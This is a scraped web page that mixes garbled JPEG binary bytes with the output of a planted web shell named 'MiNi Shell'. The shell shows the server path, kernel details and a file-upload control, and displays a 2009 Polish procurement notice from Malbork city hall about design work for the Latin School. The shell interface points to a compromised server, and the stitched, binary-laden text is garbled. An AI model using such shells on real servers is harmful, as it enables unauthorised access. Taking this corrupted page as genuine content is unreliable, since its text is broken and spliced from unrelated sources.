JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/304170-N-2009.html

<p class="kh_header"><b>Malbork: Projekt budowlany i  wykonawczy 
 Odbudowy i wprowadzenia nowych funkcji
 na terenie Szkoły Łacińskiej w Malborku</b><br>
<b>Numer ogłoszenia: 304170 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Malborka , pl. Słowiański 5, 82-200 Malbork, woj. pomorskie, tel. 055 6473325, faks 055 6473324.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malbork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt budowlany i  wykonawczy 
 Odbudowy i wprowadzenia nowych funkcji
 na terenie Szkoły Łacińskiej w Malborku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
Etap I 
wykonanie mapy do celów projektowych
wykonanie badań geologicznych - 3 kpl
wykonanie kompletnego wielobranżowego projektu budowlanego  adaptacji i rozbudowy Szkoły Łacińskiej dla funkcji opisanych powyżej (po 9 kpl na każdą branżę + 1 na nośniku elektronicznym)
uzyskanie wszelkich niezbędnych prawem decyzji i uzgodnień, w tym pozwolenia na budowę
wykonanie Szczegółowej specyfikacji sprzętu i urządzeń przewidzianych do montażu w obiekcie, niezbędnych dla zakładanych funkcji poszczególnych pomieszczeń (po 3 kpl na każdą branżę + 1 na nośniku elektronicznym)
określenie szacunkowych kosztów inwestycji z podziałem na branże 
wstępny harmonogram rzeczowo - finansowy realizacji zadania
Etap II
badania archeologiczne - 3 kpl.
wykonanie kompletnego wielobranżowego projektu wykonawczego   adaptacji i
rozbudowy Szkoły Łacińskiej dla funkcji opisanych powyżej (po  9 kpl na każdą branżę + 1 na nośniku elektronicznym
wykonanie kompletnego wielobranżowego projektu budowlano - wykonawczego sieci wod-kan i C.O niezbędnych dla prawidłowego funkcjonowania obiektu kpl zgodnie z warunkami technicznymi  (po 9 kpl na każdą branżę + 1 na nośniku elektronicznym)
Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych  (po 3 kpl na każdą branżę + 1 na nośniku elektronicznym)
przedmiary robót (po 3 kpl na każdą branżę + 1 na nośniku elektronicznym)
kosztorysy inwestorskie (po 3 kpl na każdą branżę+ 1 na nośniku elektronicznym)
Zbiorcze Zestawienie Kosztów (3 kpl. + 1 na nośniku elektronicznym).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.00.00.00-9, 74.22.20.00-1, 74.23.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium- 15000.00zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie warunków udziału w postępowaniu:
1.Posiadający uprawnienia do wykonywania określonej działalności lub czynności.
2.Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
2.1 Wykonawca musi wykazać, że w ciągu ostatnich 5 lat przed dniem wszczęcia niniejszego     
      postępowania wykonał:
2.1.1 - min. 3 dokumentacje budowlane polegające na adaptacji, rozbudowie lub budowie obiektów użyteczności publicznej obejmującej w szczególności zaprojektowanie  w nich Mediateki i MultiCenter   
2.1.2  -min. 2 dokumentacje budowlane wykonane na obiektach wpisanych do rejestru zabytków
2.2. Przedstawi koncepcję projektową w wersji papierowej i elektronicznej  zawierającą co najmniej :
        - koncepcję zagospodarowania terenu
        - rzuty poszczególnych kondygnacji z proponowanymi  rozwiązaniami 
        - przekrój poprzeczny
        - elewacje
        - wizualizaję 3 D
        - krótki opis rozwiązań funkcjonalnych i technicznych
2.3  Wykonawca musi dysponować lub przedstawi pisemne zobowiązanie innego podmiotu o udostępnieniu dla wykonawcy sprawnych maszyn i urządzeń niezbędnych dla wykonania zamówienia, 
3.  Wykonawca musi mieć do dyspozycji przy wykonaniu niniejszego zamówienia, osoby posiadające doświadczenie oraz kwalifikacje odpowiednie dla wykonania zamówienia, tj.: 
Wykonawca przedstawi w ofercie wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia takich osób, w tym obowiązkowo kandydatów na każde niżej wymienione stanowisko: 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunki  określone w pkt.2, z tym że, za spełnienie warunku określonego w pkt. 2.1. zamawiający uzna jeżeli  przynajmniej  jeden wykonawca występujący wspólnie przedstawi min. dwie realizacje. A drugi wykonawca jedną realizację. 
Wykonawca składając ofertę zobowiązuje się w przypadku podpisania umowy do skierowania do wykonania zamówienia osób wskazanych w ofercie. 

3.1Wykonawca musi się znajdować  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia,  
3.2 Wykonawca nie może zalegać  z opłacaniem podatków, opłat i składek na ubezpieczenie zdrowotne i społeczne,
3.3 Wykonawca  musi  być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunki określone w pkt.3.2, 3.3spełniają łącznie. 
4Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na mocy art.24 ust 1 i 2 Pzp.
5Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w niniejszym postępowaniu, metodą  warunku granicznego - spełnia /niespełnia.
6Z ubiegania się o udzielenie zamówienia publicznego wyklucza się wykonawców, którzy:
6.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w pkt. 1 do 3.
6.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień    publicznych.
6.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
6.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
6.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
6.6 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą.
7Zamawiający odrzuca ofertę jeżeli:
7.1 jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.87 ust.2 pkt.3 ustawy  
7.2 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
7.3 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
7.4  została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia 
7.5 zawiera błędy w obliczeniu ceny, 
7.6 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art.87 ust.2 pkt 3 ustawy 
7.7 jest nieważna na podstawie odrębnych przepisów.
8Ofertę wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.Na ofertę składają się następujące dokumenty i załączniki:

1.Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
2.Formularz cenowy
3.Koncepcja projektowa
4.Istotne postanowienia do umowy  
5.Inne dokumenty  - opisane w pkt. B - G.

B. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
1.Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp 
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia     do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed   upływem terminu składania ofert ; 
3.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt od 4 do 8 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ; 
4.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
5. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia     Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
6.Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo powinno być złożone w oryginale. 
7.Pełnomocnictwo do podpisania oferty, o ile prawo do jego podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. Pełnomocnictwo powinno być złożone w oryginale.
8.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2, 4 i 5, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: - nie otwarto jego likwidacji ani nie ogłoszono  jego upadłości, - nie orzeczono wobec niego zakazu ubiegania się o zamówienie, - nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 3, składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej należy je zastąpić dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Wszelkie dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.  Dokumenty i oświadczenia wymienione w punkcie 8 powinny być wystawione w terminach analogicznych do odpowiadających im dokumentów wymienionych w pkt 2 - 5. 
9.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty  wymienione w punktach 2-5 lub odpowiadające im dokumenty określone w pkt 8 powinny być przedłożone przez każdego Wykonawcę.
10.W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie wymienione w pkt 1 powinno być złożone przez każdego z Wykonawców wspólnie  ubiegających się o zamówienie.

C. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do  wykonania zamówienia należy złożyć następujące dokumenty: 

1.Wykaz wykonanych prac projektowych wraz z informacją o stanie procesu inwestycyjnego w ostatnich pięciu latach przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty  i miejsca wykonania.  Zadania odpowiadające swoim rodzajem i wartością i specyfiką  w tym  spełniające wymagania pkt  VI 2. SIWZ   stanowiącym przedmiot zamówienia prosimy wyraźnie zaznaczyć. Do wykazu należy dołączyć dokumenty potwierdzające, że wymienione w  wykazie zamówienia zostały wykonane należycie. 
2.Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował Wykonawca. 
3.Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 2 Wykonawca wskazał narzędzia i urządzenia , którymi będzie dysponował. 
4.Wykaz osób, którymi dysponuje  lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.  Informacja o doświadczeniu musi być podana w  rozbiciu na poszczególne usługi lub roboty, w ramach których dana osoba zdobywała kwalifikacje  
5.Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania  zamówienia , jeżeli w wykazie, o którym mowa w pkt.4, Wykonawca wskazał osoby którymi będzie dysponował. 
6.  Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich  uprawnień, tj. przede wszystkim kopie uprawnień wraz z oświadczeniem lub decyzją o wpisie do GINB ( od 01.1995 r.) oraz kopie zaświadczeń o wpisie na odpowiednią listę zawodową osób przewidzianych przez Wykonawcę do pełnienia funkcji kierownika budowy i kierowników robót branżowych.

D. W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 

1.Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
2.Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

1.Zamiast dokumentów, o których mowa w pkt. B.2, B.4, B.5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające    odpowiednio, że:
1)nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i    zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na  raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3)nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.Zamiast dokumentu, o którym mowa w pkt B.3 , składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt  4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   



F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy
2.Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B, D i E  dla każdego partnera z osobna,  dokumenty opisane w pkt. C i G mogą być złożone wspólnie   

G. W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: 
1. referencje inwestorów potwierdzające należyte wykonanie przedmiotu umowy zgodnie z zapisami pkt.C.1.
2.Dokumentację fotograficzną zrealizowanych zadań ze szczególnym uwzględnieniem Multitek i MultiCenter

H. Postanowienia dotyczące składanych dokumentów

1.Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
2.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - koncepcja - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.malbork.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Malborka, Pl. Słowiański 5, 82-200 Malbork, Wydział IZP.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2009 godzina 10:00, miejsce: Urząd Miasta Malborka, Plac Słowiański 5, 82-200  Malbork, Pokój nr 115 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Odbudowa i wprowadzenie nowych funkcji na terenie Szkoły Łacińskiej        w Malborku współfinansowany przez Unię Europejską

Creat By MiNi SheLL
Email: jattceo@gmail.com